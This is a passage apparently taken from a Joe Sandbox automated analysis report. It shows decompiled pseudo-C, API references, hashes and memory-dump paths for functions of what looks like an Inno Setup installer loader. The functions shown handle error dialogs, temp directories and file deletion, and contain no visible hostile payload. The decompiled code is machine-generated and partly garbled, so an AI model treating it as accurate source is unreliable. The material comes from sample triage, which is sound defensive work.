								do {
									_t2 = _t19 % 0xa;
									_t19 = _t19 / 0xa;
									 *_t29 = _t2 + 0x30;
									_t29 = _t29 - 1;
								} while (_t19 != 0);
								_t30 = 0x40b030;
								_t20 =  *0x40c028; // 0x0
								_t21 = _t20 - 0x401178;
								do {
									 *_t30 =  *((intOrPtr*)((_t21 & 0x0000000f) + 0x403e1c));
									_t30 = _t30 - 1;
									_t21 = _t21 >> 4;
								} while (_t21 != 0);
								if( *0x40c031 != 0) {
									E00403FE4(0x40c204, "Runtime error     at 00000000");
									E00403F67();
								} else {
									MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
								}
							}
							E00403CC8(0x40c038);
							E00403CC8(0x40c204); // executed
							E004019DC(); // executed
							if( *0x40c414 == 0) {
								E004030B4();
								goto L17;
							}
						}
					}
				}
				E004030B4();
				 *0x40c414 = 0;
				_t15 =  *0x40c020; // 0x0
				asm("sbb eax, eax");
				return  ~_t15 + 1;
			}

0x00403d04
0x00403d10
0x00000000
0x00403d12
0x00403d12
0x00403d19
0x00403ddf
0x00403de5
0x00403d1f
0x00403d1f
0x00403d29
0x00403d29
0x00403d29
0x00403d2e
0x00403d30
0x00000000
0x00000000
0x00403d34
0x00403d3a
0x00403d3a
0x00403d45
0x00403d47
0x00403d4c
0x00403d56
0x00403d58
0x00403d58
0x00403d5d
0x00403d5f
0x00403d60
0x00403d64
0x00403d69
0x00403d6e
0x00403d73
0x00403d7e
0x00403d80
0x00403d81
0x00403d81
0x00403d8d
0x00403dae
0x00403db3
0x00403d8f
0x00403d9d
0x00403d9d
0x00403d8d
0x00403dbd
0x00403dc7
0x00403dcc
0x00403dd8
0x00403dda
0x00000000
0x00403dda
0x00403dd8
0x00403d1f
0x00403d19
0x00403dea
0x00403def
0x00403df6
0x00403dfd
0x00403e19

APIs

MessageBoxA.USER32 ref: 00403D9D
ExitProcess.KERNEL32 ref: 00403DE5

Strings

Runtime error at 00000000, xrefs: 00403D96, 00403DA9
Error, xrefs: 00403D91

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ExitMessageProcess
String ID: Error$Runtime error at 00000000
API String ID: 1220098344-2970929446
Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E

Uniqueness

Uniqueness Score: -1.00%

Function 00401918 Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E00401918() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E004019CE);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x40c41c);
				L0040126C();
				if( *0x40c032 != 0) {
					_push(0x40c41c);
					L00401274();
				}
				E004012DC(0x40c43c);
				E004012DC(0x40c44c);
				E004012DC(0x40c478);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x40c474 = _t11;
				if( *0x40c474 != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x40c474; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x40c460)) = 0x40c45c;
					 *0x40c45c = 0x40c45c;
					 *0x40c468 = 0x40c45c;
					 *0x40c415 = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E004019D5);
				if( *0x40c032 != 0) {
					_push(0x40c41c);
					L0040127C();
					return 0;
				}
				return 0;
			}

0x0040191d
0x0040191e
0x00401923
0x00401926
0x00401929
0x0040192e
0x0040193a
0x0040193c
0x00401941
0x00401941
0x0040194b
0x00401955
0x0040195f
0x0040196b
0x00401970
0x0040197c
0x0040197e
0x00401983
0x00401983
0x0040198b
0x0040198f
0x00401990
0x0040199c
0x0040199f
0x004019a1
0x004019a6
0x004019a6
0x004019af
0x004019b2
0x004019b5
0x004019c1
0x004019c3
0x004019c8
0x00000000
0x004019c8
0x004019cd

APIs

RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CriticalSection$AllocEnterInitializeLeaveLocal
String ID:
API String ID: 730355536-0
Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00409308 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 56%

			E00409308(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				int _t30;
				intOrPtr _t62;
				void* _t72;
				intOrPtr _t75;

				_t70 = __edi;
				_t53 = __ebx;
				_t54 = 0;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__edi);
				_t72 = __eax;
				_push(_t75);
				_push(0x4093f7);
				_push( *[fs:eax]);
				 *[fs:eax] = _t75;
				while(1) {
					E00406CCC( &_v12, _t53, _t54, _t70, _t72); // executed
					_t54 = 0x409410;
					E004091FC(0, _t53, 0x409410, _v12, _t70, _t72,  &_v8); // executed
					_t30 = CreateDirectoryA(E00403414(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t53 = GetLastError();
					if(_t38 != 0xb7) {
						E00408DB0(0x2f,  &_v28, _v8);
						_v24 = _v28;
						E00404C5C(_t53,  &_v32);
						_v20 = _v32;
						E0040725C(_t53,  &_v36);
						_v16 = _v36;
						E00408D80(0x60, 2,  &_v24,  &_v12);
						_t54 = _v12;
						E00405858(_v12, 1);
						E00402EB4();
					}
				}
				E0040322C(_t72, _v8);
				_pop(_t62);
				 *[fs:eax] = _t62;
				_push(E004093FE);
				E004031B8( &_v36, 3);
				return E004031B8( &_v12, 2);
			}

0x00409308
0x00409308
0x0040930b
0x0040930d
0x0040930e
0x0040930f
0x00409310
0x00409311
0x00409312
0x00409313
0x00409314
0x00409315
0x00409317
0x00409318
0x0040931c
0x0040931d
0x00409322
0x00409325
0x00409328
0x0040932f
0x00409337
0x0040933e
0x0040934e
0x00409355
0x00000000
0x00000000
0x0040935c
0x00409364
0x00409372
0x0040937a
0x00409382
0x0040938a
0x00409392
0x0040939a
0x004093a7
0x004093ac
0x004093b6
0x004093bb
0x004093bb
0x00409364
0x004093ca
0x004093d1
0x004093d4
0x004093d7
0x004093e4
0x004093f6

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,004093F7,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040934E
GetLastError.KERNEL32(00000000,00000000,?,00000000,004093F7,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409357

Strings

.tmp, xrefs: 00409337

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: .tmp
API String ID: 1375471231-2986845003
Opcode ID: 6b2e7232e07e9fc2c26c6f96631df12cd00f241c8ec2fd1505b5088953cd09fc
Instruction ID: 2d5729db6454da3e1ba77009eea48eca063b4dc7eb7983fd21563a30db86577b
Opcode Fuzzy Hash: 6b2e7232e07e9fc2c26c6f96631df12cd00f241c8ec2fd1505b5088953cd09fc
Instruction Fuzzy Hash: 03216774A002099BDB00FFA1C9529DFB7B8EF88304F10457BE901B73C2DA7C9E059AA5

Uniqueness

Uniqueness Score: -1.00%

Function 004094B0 Relevance: 5.0, APIs: 4, Instructions: 45
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004094B0(long __eax, intOrPtr __edx, long _a4, long _a8) {
				intOrPtr _v8;
				long _t5;
				long _t9;
				void* _t10;
				void* _t13;
				void* _t15;
				void* _t16;

				_t5 = __eax;
				_v8 = __edx;
				_t9 = __eax;
				_t15 = _t10 - 1;
				if(_t15 < 0) {
					L10:
					return _t5;
				}
				_t16 = _t15 + 1;
				_t13 = 0;
				while(1) {
					_t19 = _t13 - 1;
					if(_t13 != 1) {
						__eflags = _t13 - 1;
						if(__eflags > 0) {
							Sleep(_a4);
						}
					} else {
						Sleep(_a8);
					}
					_t5 = E00408F94(_t9, _v8, _t19); // executed
					if(_t5 != 0) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 2) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 3) {
						goto L10;
					}
					_t13 = _t13 + 1;
					_t16 = _t16 - 1;
					if(_t16 != 0) {
						continue;
					}
					goto L10;
				}
				goto L10;
			}

0x004094b0
0x004094b7
0x004094ba
0x004094be
0x004094c1
0x0040950f
0x0040950f
0x0040950f
0x004094c3
0x004094c4
0x004094c6
0x004094c6
0x004094c9
0x004094d6
0x004094d9
0x004094df
0x004094df
0x004094cb
0x004094cf
0x004094cf
0x004094e9
0x004094f0
0x00000000
0x00000000
0x004094f2
0x004094fa
0x00000000
0x00000000
0x004094fc
0x00409504
0x00000000
0x00000000
0x00409506
0x00409507
0x00409508
0x00000000
0x00000000
0x00000000
0x00409508
0x00000000

APIs

Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A1F8,000000FA,00000032,0040A25F,004098F0,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 004094CF
Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A1F8,000000FA,00000032,0040A25F,004098F0,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000), ref: 004094DF
GetLastError.KERNEL32(?,?,?,0000000D,?,0040A1F8,000000FA,00000032,0040A25F,004098F0,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000), ref: 004094F2
GetLastError.KERNEL32(?,?,?,0000000D,?,0040A1F8,000000FA,00000032,0040A25F,004098F0,00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000), ref: 004094FC

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ErrorLastSleep
String ID:
API String ID: 1458359878-0
Opcode ID: f4429a3050b32010c80a8013038ca14275e5e5820772cdc126414ab3e7bd32e2
Instruction ID: e27fa5b601cfdba55910e94f28c51cb2e9f1bd57835f1bb38e531f5656028c14
Opcode Fuzzy Hash: f4429a3050b32010c80a8013038ca14275e5e5820772cdc126414ab3e7bd32e2
Instruction Fuzzy Hash: 39F0967760421477CB35A9AF9D85A6F734DDAD1358710413BE904F7283D438CD4242A9

Uniqueness

Uniqueness Score: -1.00%

Function 00409E1F Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 73%

			E00409E1F(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t57;
				CHAR* _t58;
				int _t63;
				void* _t64;
				intOrPtr _t65;
				void* _t69;
				intOrPtr _t72;
				intOrPtr _t76;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t90;
				void* _t91;
				void* _t92;
				void* _t93;
				intOrPtr _t94;

				_t92 = __esi;
				_t91 = __edi;
				_t64 = __ebx;
				_pop(_t76);
				_pop(_t67);
				 *[fs:eax] = _t76;
				E004098CC(_t67);
				if(( *0x40cdd6 & 0x00000001) == 0 &&  *0x40b234 == 0) {
					_t57 =  *0x40cbac; // 0x0
					_t58 = E00403414(_t57);
					_t67 = _t93 - 0x10;
					_t76 =  *0x40cca8; // 0x20e1494
					E00408DB0(0x98, _t93 - 0x10, _t76);
					_t63 = MessageBoxA(0, E00403414( *((intOrPtr*)(_t93 - 0x10))), _t58, 0x24);
					_t97 = _t63 - 6;
					if(_t63 != 6) {
						 *0x40b240 = 2;
						E0040582C();
					}
				}
				E004026C4();
				E00409308(_t93 - 0x10, _t64, _t76, _t91, _t92); // executed
				E004031E8(0x40cdf8, _t64,  *((intOrPtr*)(_t93 - 0x10)), _t91, _t92);
				_t24 =  *0x40cde8; // 0x20d03cc
				E00406900(_t24, _t67, _t93 - 0x24);
				E00406698( *((intOrPtr*)(_t93 - 0x24)), _t64, _t93 - 0x10, 0x40a2f0, _t91, _t92, _t97);
				_push( *((intOrPtr*)(_t93 - 0x10)));
				_t29 =  *0x40cdf8; // 0x20e7da4
				E00406610(_t29, _t93 - 0x24);
				_pop(_t69);
				E00403340(0x40cdfc, _t69,  *((intOrPtr*)(_t93 - 0x24)));
				_t82 =  *0x40cdfc; // 0x20e7e60
				E004031E8(0x40ce00, _t64, _t82, _t91, _t92);
				_t35 =  *0x40cdf4; // 0x413010
				_t13 = _t35 + 0x14; // 0x17906b
				_t36 =  *0x40cdec; // 0x0
				E004074A0(_t36,  *_t13);
				_push(_t93);
				_push(0x40a0b7);
				_push( *[fs:edx]);
				 *[fs:edx] = _t94;
				 *0x40ce44 = 0;
				_t40 = E004074B8(1, 0, 1, 0); // executed
				 *0x40cdf0 = _t40;
				 *[fs:eax] = _t94;
				_t42 =  *0x40cdf4; // 0x413010
				_t14 = _t42 + 0x18; // 0xae000
				 *0x40ce44 = E00402594( *_t14,  *[fs:eax], 0x40a0a6, _t93);
				_t65 =  *0x40ce44; // 0x20e7eac
				_t86 =  *0x40cdf4; // 0x413010
				_t15 = _t86 + 0x18; // 0xae000
				E0040277C(_t65,  *_t15);
				_push(_t93);
				_push(0x409ff3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t94;
				_t72 =  *0x40cdec; // 0x0
				_t49 = E00407A00(_t72, 1, E00407D30); // executed
				 *0x40ce48 = _t49;
				_push(_t93);
				_push(0x409fe2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t94;
				_t51 =  *0x40cdf4; // 0x413010
				_t16 = _t51 + 0x18; // 0xae000
				_t52 =  *0x40ce48; // 0x2195eb0
				E00407C90(_t52,  *_t16, _t65);
				_pop(_t90);
				 *[fs:eax] = _t90;
				_push(E00409FE9);
				_t55 =  *0x40ce48; // 0x2195eb0
				return E00402924(_t55);
			}

0x00409e1f
0x00409e1f
0x00409e1f
0x00409e21
0x00409e23
0x00409e24
0x00409e44
0x00409e50
0x00409e5d
0x00409e62
0x00409e68
0x00409e6b
0x00409e73
0x00409e83
0x00409e88
0x00409e8b
0x00409e8d
0x00409e97
0x00409e97
0x00409e8b
0x00409e9c
0x00409ea4
0x00409eb1
0x00409eb9
0x00409ebe
0x00409ece
0x00409ed6
0x00409eda
0x00409edf
0x00409eec
0x00409eed
0x00409ef7
0x00409efd
0x00409f02
0x00409f07
0x00409f0a
0x00409f0f
0x00409f16
0x00409f17
0x00409f1c
0x00409f1f
0x00409f24
0x00409f3c
0x00409f41
0x00409f51
0x00409f54
0x00409f59
0x00409f61
0x00409f66
0x00409f70
0x00409f76
0x00409f79
0x00409f80
0x00409f81
0x00409f86
0x00409f89
0x00409f91
0x00409f9e
0x00409fa3
0x00409faa
0x00409fab
0x00409fb0
0x00409fb3
0x00409fb8
0x00409fbd
0x00409fc0
0x00409fc5
0x00409fcc
0x00409fcf
0x00409fd2
0x00409fd7
0x00409fe1

APIs

MessageBoxA.USER32 ref: 00409E83

Strings

.tmp, xrefs: 00409EC9

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Message
String ID: .tmp
API String ID: 2030045667-2986845003
Opcode ID: 57a9efdba9b43464d57cdc6827c101bef64e26d0652db7f1e53f771b22dc316b
Instruction ID: 970b058b2921c9d07775ffc554eea41c98c3cd3b09bb8e74c3f7a47f57a22b4b
Opcode Fuzzy Hash: 57a9efdba9b43464d57cdc6827c101bef64e26d0652db7f1e53f771b22dc316b
Instruction Fuzzy Hash: 23419F30604201DFC715EF29DE92A5A7BA6FB49304B10453AF800B73E2CB79AC41DAAD

Uniqueness

Uniqueness Score: -1.00%

Function 00409E3A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 113
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			E00409E3A(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t57;
				CHAR* _t58;
				int _t63;
				void* _t64;
				intOrPtr _t65;
				void* _t68;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				intOrPtr _t93;

				_t91 = __esi;
				_t90 = __edi;
				_t66 = __ecx;
				_t64 = __ebx;
				E00409A78();
				E00402F24();
				E004098CC(_t66);
				if(( *0x40cdd6 & 0x00000001) == 0 &&  *0x40b234 == 0) {
					_t57 =  *0x40cbac; // 0x0
					_t58 = E00403414(_t57);
					_t66 = _t92 - 0x10;
					_t75 =  *0x40cca8; // 0x20e1494
					E00408DB0(0x98, _t92 - 0x10, _t75);
					_t63 = MessageBoxA(0, E00403414( *((intOrPtr*)(_t92 - 0x10))), _t58, 0x24);
					_t96 = _t63 - 6;
					if(_t63 != 6) {
						 *0x40b240 = 2;
						E0040582C();
					}
				}
				E004026C4();
				E00409308(_t92 - 0x10, _t64, _t75, _t90, _t91); // executed
				E004031E8(0x40cdf8, _t64,  *((intOrPtr*)(_t92 - 0x10)), _t90, _t91);
				_t24 =  *0x40cde8; // 0x20d03cc
				E00406900(_t24, _t66, _t92 - 0x24);
				E00406698( *((intOrPtr*)(_t92 - 0x24)), _t64, _t92 - 0x10, 0x40a2f0, _t90, _t91, _t96);
				_push( *((intOrPtr*)(_t92 - 0x10)));
				_t29 =  *0x40cdf8; // 0x20e7da4
				E00406610(_t29, _t92 - 0x24);
				_pop(_t68);
				E00403340(0x40cdfc, _t68,  *((intOrPtr*)(_t92 - 0x24)));
				_t81 =  *0x40cdfc; // 0x20e7e60
				E004031E8(0x40ce00, _t64, _t81, _t90, _t91);
				_t35 =  *0x40cdf4; // 0x413010
				_t13 = _t35 + 0x14; // 0x17906b
				_t36 =  *0x40cdec; // 0x0
				E004074A0(_t36,  *_t13);
				_push(_t92);
				_push(0x40a0b7);
				_push( *[fs:edx]);
				 *[fs:edx] = _t93;
				 *0x40ce44 = 0;
				_t40 = E004074B8(1, 0, 1, 0); // executed
				 *0x40cdf0 = _t40;
				 *[fs:eax] = _t93;
				_t42 =  *0x40cdf4; // 0x413010
				_t14 = _t42 + 0x18; // 0xae000
				 *0x40ce44 = E00402594( *_t14,  *[fs:eax], 0x40a0a6, _t92);
				_t65 =  *0x40ce44; // 0x20e7eac
				_t85 =  *0x40cdf4; // 0x413010
				_t15 = _t85 + 0x18; // 0xae000
				E0040277C(_t65,  *_t15);
				_push(_t92);
				_push(0x409ff3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t93;
				_t71 =  *0x40cdec; // 0x0
				_t49 = E00407A00(_t71, 1, E00407D30); // executed
				 *0x40ce48 = _t49;
				_push(_t92);
				_push(0x409fe2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t93;
				_t51 =  *0x40cdf4; // 0x413010
				_t16 = _t51 + 0x18; // 0xae000
				_t52 =  *0x40ce48; // 0x2195eb0
				E00407C90(_t52,  *_t16, _t65);
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00409FE9);
				_t55 =  *0x40ce48; // 0x2195eb0
				return E00402924(_t55);
			}

0x00409e3a
0x00409e3a
0x00409e3a
0x00409e3a
0x00409e3a
0x00409e3f
0x00409e44
0x00409e50
0x00409e5d
0x00409e62
0x00409e68
0x00409e6b
0x00409e73
0x00409e83
0x00409e88
0x00409e8b
0x00409e8d
0x00409e97
0x00409e97
0x00409e8b
0x00409e9c
0x00409ea4
0x00409eb1
0x00409eb9
0x00409ebe
0x00409ece
0x00409ed6
0x00409eda
0x00409edf
0x00409eec
0x00409eed
0x00409ef7
0x00409efd
0x00409f02
0x00409f07
0x00409f0a
0x00409f0f
0x00409f16
0x00409f17
0x00409f1c
0x00409f1f
0x00409f24
0x00409f3c
0x00409f41
0x00409f51
0x00409f54
0x00409f59
0x00409f61
0x00409f66
0x00409f70
0x00409f76
0x00409f79
0x00409f80
0x00409f81
0x00409f86
0x00409f89
0x00409f91
0x00409f9e
0x00409fa3
0x00409faa
0x00409fab
0x00409fb0
0x00409fb3
0x00409fb8
0x00409fbd
0x00409fc0
0x00409fc5
0x00409fcc
0x00409fcf
0x00409fd2
0x00409fd7
0x00409fe1

APIs

MessageBoxA.USER32 ref: 00409E83

Strings

.tmp, xrefs: 00409EC9

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Message
String ID: .tmp
API String ID: 2030045667-2986845003
Opcode ID: 2eb67a5b9d741b707a7904614084c565494b3536ed3c117917ce0de2f63c934a
Instruction ID: b12dedc7aec541d20a2050c4a09f31dfcbc24605b4d9b3369922fb205b4dfd05
Opcode Fuzzy Hash: 2eb67a5b9d741b707a7904614084c565494b3536ed3c117917ce0de2f63c934a
Instruction Fuzzy Hash: 2E416D30600201DFC715EF29DED2A5A7BA6FB49704B10453AF801B73E2CA79AC41DBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00401FD4 Relevance: 3.1, APIs: 2, Instructions: 122
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017

Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
String ID:
API String ID: 296031713-0
Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00408F94 Relevance: 3.0, APIs: 2, Instructions: 42
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E00408F94(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E00408F48(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x408ff1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = DeleteFileA(E00403414(__edx)); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E00408FF8);
					return E00408F84( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}

0x00408f95
0x00408f97
0x00408fac
0x00408fb7
0x00408fb8
0x00408fbd
0x00408fc0
0x00408fcb
0x00408fd0
0x00408fd8
0x00408fdd
0x00408fe0
0x00408fe3
0x00408ff0
0x00408fae
0x00408fb0
0x00409009
0x00409009

APIs

DeleteFileA.KERNEL32(00000000,00000000,00408FF1,?,0000000D,00000000), ref: 00408FCB
GetLastError.KERNEL32(00000000,00000000,00408FF1,?,0000000D,00000000), ref: 00408FD3

Memory Dump Source

Source File: 00000000.00000002.324946827.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.324942483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324955743.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.324961165.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: 486d5fe44f70020a4dd07c112c1ecb1f1a02d0fe2caacd69a5ab5c79924fdc84
Instruction ID: b1aac6b2d26ab0892cc0f9e4d92da460b71e8916038044c8d167ee50180c64ed
